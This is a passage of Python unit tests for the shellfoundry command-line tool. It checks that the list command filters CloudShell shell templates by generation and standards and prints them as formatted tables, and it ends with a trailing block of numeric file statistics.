def test_filter_by_legacy_shows_all_legacy_templates(self, max_width_mock, echo_mock):
# Arrange
max_width_mock.return_value = 62
template_retriever = Mock()
template_retriever.get_templates = Mock(return_value={
'gen2/networking/switch': [ShellTemplate('gen2/networking/switch',
'TOSCA based template for standard Switch devices/virtual appliances',
'', '8.0')],
'gen2/networking/WirelessController': [ShellTemplate('gen2/networking/WirelessController',
'TOSCA based template for standard WirelessController devices/virtual appliances',
'', '8.0')],
'gen1/base': [ShellTemplate('gen1/base', 'base description', '', '7.0')],
'gen1/switch': [ShellTemplate('gen1/switch', 'switch description', '', '7.0')]})
flag_value = 'gen1'
standards = Mock()
standards.fetch.return_value = {}
list_command_executor = ListCommandExecutor(
template_retriever=FilteredTemplateRetriever(flag_value, template_retriever), standards=standards)
# Act
list_command_executor.list()
# Assert
echo_mock.assert_any_call(
u' Template Name CloudShell Ver. Description \n'
u'----------------------------------------------------\n'
u' gen1/base 7.0 and up base description \n'
u' gen1/switch 7.0 and up switch description ')
@patch('click.echo')
@patch('shellfoundry.commands.list_command.AsciiTable.column_max_width')
def test_filter_by_all_shows_all_templates(self, max_width_mock, echo_mock):
# Arrange
max_width_mock.return_value = 40
template_retriever = Mock()
template_retriever.get_templates = Mock(return_value={
'gen1/base': [ShellTemplate('gen1/base', 'base description', '', '7.0')],
'gen1/switch': [ShellTemplate('gen1/switch', 'switch description', '', '7.0')],
'gen2/networking/switch': [ShellTemplate('gen2/networking/switch',
'TOSCA based template for standard Switch devices/virtual appliances',
'', '8.0')],
'gen2/networking/WirelessController': [ShellTemplate('gen2/networking/WirelessController',
'TOSCA based template for standard WirelessController devices/virtual appliances',
'', '8.0')]})
flag_value = 'all'
standards = Mock()
standards.fetch.return_value = {}
list_command_executor = ListCommandExecutor(
template_retriever=FilteredTemplateRetriever(flag_value, template_retriever), standards=standards)
# Act
list_command_executor.list()
# Assert
echo_mock.assert_any_call(
u' Template Name CloudShell Ver. Description \n'
u'-----------------------------------------------------------------------------------------------\n'
u' gen2/networking/WirelessController 8.0 and up TOSCA based template for standard \n'
u' WirelessController devices/virtual \n'
u' appliances \n'
u' gen1/base 7.0 and up base description \n'
u' gen1/switch 7.0 and up switch description \n'
u' gen2/networking/switch 8.0 and up TOSCA based template for standard Switch \n'
u' devices/virtual appliances ')
# @patch('click.echo')
@patch('shellfoundry.commands.list_command.AsciiTable.column_max_width')
def test_list_shows_nothing_because_filter_is_set_for_templates_that_do_not_exist(self, max_width_mock):
# Arrange
max_width_mock.return_value = 40
template_retriever = Mock()
template_retriever.get_templates = Mock(return_value={
'gen2/networking/switch': [ShellTemplate('gen2/networking/switch',
'TOSCA based template for standard Switch devices/virtual appliances',
'', '8.0')],
'gen2/networking/WirelessController': [ShellTemplate('gen2/networking/WirelessController',
'TOSCA based template for standard WirelessController devices/virtual appliances',
'', '8.0')]})
flag_value = 'gen1'
standards = Mock()
standards.fetch.return_value = {}
list_command_executor = ListCommandExecutor(
template_retriever=FilteredTemplateRetriever(flag_value, template_retriever), standards=standards)
# Act
with self.assertRaisesRegexp(ClickException, "No templates matched the view criteria\(gen1/gen2\) or "
"available templates and standards are not compatible"):
list_command_executor.list()
# Assert
# echo_mock.assert_called_once_with("No templates matched the criteria")
@patch('click.echo')
@patch('shellfoundry.commands.list_command.AsciiTable.column_max_width')
def test_devguide_text_note_appears_when_no_filter_was_selected(self, max_width_mock, echo_mock):
# Arrange
max_width_mock.return_value = 40
template_retriever = Mock()
template_retriever.get_templates = Mock(return_value={
'gen2/networking/switch': [ShellTemplate('gen2/networking/switch',
'TOSCA based template for standard Switch devices/virtual appliances',
'', '8.0')],
'gen2/networking/WirelessController': [ShellTemplate('gen2/networking/WirelessController',
'TOSCA based template for standard WirelessController devices/virtual appliances',
'', '8.0')]})
flag_value = None
standards = Mock()
standards.fetch.return_value = {}
list_command_executor = ListCommandExecutor(
template_retriever=FilteredTemplateRetriever(flag_value, template_retriever), standards=standards)
# Act
list_command_executor.list()
# Assert
echo_mock.assert_any_call('''
As of CloudShell 8.0, CloudShell uses 2nd generation shells, to view the list of 1st generation shells use: shellfoundry list --gen1.
For more information, please visit our devguide: https://qualisystems.github.io/devguide/''')
@patch('click.echo')
@patch('shellfoundry.commands.list_command.AsciiTable.column_max_width')
@patch('shellfoundry.commands.list_command.Configuration')
@patch.object(TemplateRetriever, '_get_min_cs_version')
@httpretty.activate
def test_templates_are_filtered_based_upon_the_result_of_cs_standards(self, _get_min_cs_version, conf_class,
max_width_mock, echo_mock):
# Arrange
_get_min_cs_version.return_value = None
configuration = MagicMock(read=MagicMock(return_value=MagicMock(online_mode="True")))
conf_class.return_value = configuration
max_width_mock.return_value = 40
templates = """templates:
- name : gen1/resource
description : base description
repository : https://github.com/QualiSystems/shell-resource-standard
params:
project_name :
min_cs_ver: 7.0
- name : gen1/switch
description : switch description
repository : https://github.com/QualiSystems/shell-switch-standard
params:
project_name :
min_cs_ver: 7.0
- name : gen2/resource
params:
project_name :
family_name:
description : 2nd generation shell template for a standard resource
repository : https://github.com/QualiSystems/shellfoundry-tosca-resource-template
min_cs_ver: 8.0
- name : gen2/networking/switch
params:
project_name :
family_name: Switch
description : 2nd generation shell template for a standard switch
repository : https://github.com/QualiSystems/shellfoundry-tosca-networking-template
min_cs_ver: 8.0
- name : gen2/networking/wireless-controller
params:
project_name :
family_name: WirelessController
description : 2nd generation shell template for a standard wireless controller
repository : https://github.com/QualiSystems/shellfoundry-tosca-networking-template
min_cs_ver: 8.0"""
flag_value = 'all'
standards = Mock()
standards.fetch.return_value = {"resource": ['5.0.0']}
template_retriever = FilteredTemplateRetriever(flag_value, TemplateRetriever())
httpretty.register_uri(httpretty.GET, TEMPLATES_YML, body=templates)
list_command_executor = ListCommandExecutor(template_retriever=template_retriever, standards=standards)
# Act
list_command_executor.list()
# Assert
echo_mock.assert_any_call(
u' Template Name CloudShell Ver. Description \n'
u'---------------------------------------------------------------------\n'
u' gen1/resource 7.0 and up base description \n'
u' gen1/switch 7.0 and up switch description \n'
u' gen2/resource 8.0 and up 2nd generation shell template for a \n'
u' standard resource ')
@patch('click.echo')
@patch('shellfoundry.commands.list_command.AsciiTable.column_max_width')
@patch('shellfoundry.commands.list_command.Configuration')
@patch.object(TemplateRetriever, '_get_min_cs_version')
@httpretty.activate
def test_templates_are_filtered_based_upon_the_result_of_cs_standards_gen2(self, _get_min_cs_version, conf_class,
max_width_mock, echo_mock):
# Arrange
_get_min_cs_version.return_value = None
configuration = MagicMock(read=MagicMock(return_value=MagicMock(online_mode="True")))
conf_class.return_value = configuration
max_width_mock.return_value = 40
templates = """templates:
- name : gen1/resource
description : base description
repository : https://github.com/QualiSystems/shell-resource-standard
params:
project_name :
min_cs_ver: 7.0
- name : gen1/switch
description : switch description
repository : https://github.com/QualiSystems/shell-switch-standard
params:
project_name :
min_cs_ver: 7.0
- name : gen2/resource
params:
project_name :
family_name:
description : 2nd generation shell template for a standard resource
repository : https://github.com/QualiSystems/shellfoundry-tosca-resource-template
min_cs_ver: 8.0
- name : gen2/networking/switch
params:
project_name :
family_name: Switch
description : 2nd generation shell template for a standard switch
repository : https://github.com/QualiSystems/shellfoundry-tosca-networking-template
min_cs_ver: 8.0
- name : gen2/networking/wireless-controller
params:
project_name :
family_name: WirelessController
description : 2nd generation shell template for a standard wireless controller
repository : https://github.com/QualiSystems/shellfoundry-tosca-networking-template
min_cs_ver: 8.0"""
flag_value = 'gen2'
standards = Mock()
standards.fetch.return_value = {"networking": ['5.0.0']}
template_retriever = FilteredTemplateRetriever(flag_value, TemplateRetriever())
httpretty.register_uri(httpretty.GET, TEMPLATES_YML, body=templates)
list_command_executor = ListCommandExecutor(template_retriever=template_retriever, standards=standards)
# Act
list_command_executor.list()
# Assert
echo_mock.assert_any_call(
u' Template Name CloudShell Ver. Description \n'
u'-------------------------------------------------------------------------------------------\n'
u' gen2/networking/switch 8.0 and up 2nd generation shell template for a \n'
u' standard switch \n'
u' gen2/networking/wireless-controller 8.0 and up 2nd generation shell template for a \n'
u' standard wireless controller ')
class TestListCommandWithFakeFs(fake_filesystem_unittest.TestCase):
def setUp(self):
self.setUpPyfakefs()
@staticmethod
def get_8_0_templates_output():
return (
u' Template Name CloudShell Ver. Description \n'
u'-------------------------------------------------------------------------------------------------------------------\n'
u' gen1/compute 7.0 and up 1st generation shell template for compute servers \n'
u' gen1/deployed-app 7.0 and up 1st generation shell template for a deployed app \n'
u' gen1/firewall 7.0 and up 1st generation shell template for a standard firewall \n'
u' gen1/networking/router 7.0 and up 1st generation shell template for a standard router \n'
u' gen1/networking/switch 7.0 and up 1st generation shell template for a standard switch \n'
u' gen1/pdu 7.0 and up 1st generation shell template for a standard pdu \n'
u' gen1/resource 7.0 and up 1st generation shell template for basic inventory resources \n'
u' gen1/resource-clean 7.0 and up 1st generation shell template for basic inventory resources \n'
u' (without sample commands) \n'
u' gen2/compute 8.0 and up 2nd generation shell template for compute servers \n'
u' gen2/deployed-app 8.0 and up 2nd generation shell template for a deployed app \n'
u' gen2/firewall 8.0 and up 2nd generation shell template for firewall resources \n'
u' gen2/networking/router 8.0 and up 2nd generation shell template for a standard router \n'
u' gen2/networking/switch 8.0 and up 2nd generation shell template for a standard switch \n'
u' gen2/networking/wireless-controller 8.0 and up 2nd generation shell template for a standard wireless \n'
u' controller \n'
u' gen2/pdu 8.0 and up 2nd generation shell template for a standard pdu \n'
u' gen2/resource 8.0 and up 2nd generation shell template for basic inventory resources \n'
u' layer-1-switch 7.0 and up A native shell template for layer 1 switches ')
@patch('click.echo')
@patch('shellfoundry.commands.list_command.AsciiTable.column_max_width')
def test_get_cs_standards_unavailable_shows_cs_8_0_shipped_templates(self, max_width_mock, echo_mock):
# Arrange
max_width_mock.return_value = 60
from shellfoundry import ALTERNATIVE_TEMPLATES_PATH
self.fs.add_real_file(ALTERNATIVE_TEMPLATES_PATH)
standards = Mock(fetch=Mock(side_effect=FeatureUnavailable()))
template_retriever = FilteredTemplateRetriever('all', TemplateRetriever())
list_command_executor = ListCommandExecutor(template_retriever=template_retriever, standards=standards)
# Act
list_command_executor.list()
# Assert
templates_output = self.get_8_0_templates_output()
echo_mock.assert_any_call(templates_output)
| 54.507905
| 151
| 0.555346
| 2,589
| 27,581
| 5.722287
| 0.086906
| 0.008235
| 0.014985
| 0.043874
| 0.863989
| 0.857037
| 0.853729
| 0.846777
| 0.842727
| 0.81971
| 0
| 0.017849
| 0.339835
| 27,581
| 505
| 152
| 54.615842
| 0.795804
| 0.022624
| 0
| 0.747368
| 0
| 0.007895
| 0.488981
| 0.114237
| 0
| 0
| 0
| 0
| 0.034211
| 1
| 0.039474
| false
| 0
| 0.028947
| 0.002632
| 0.076316
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|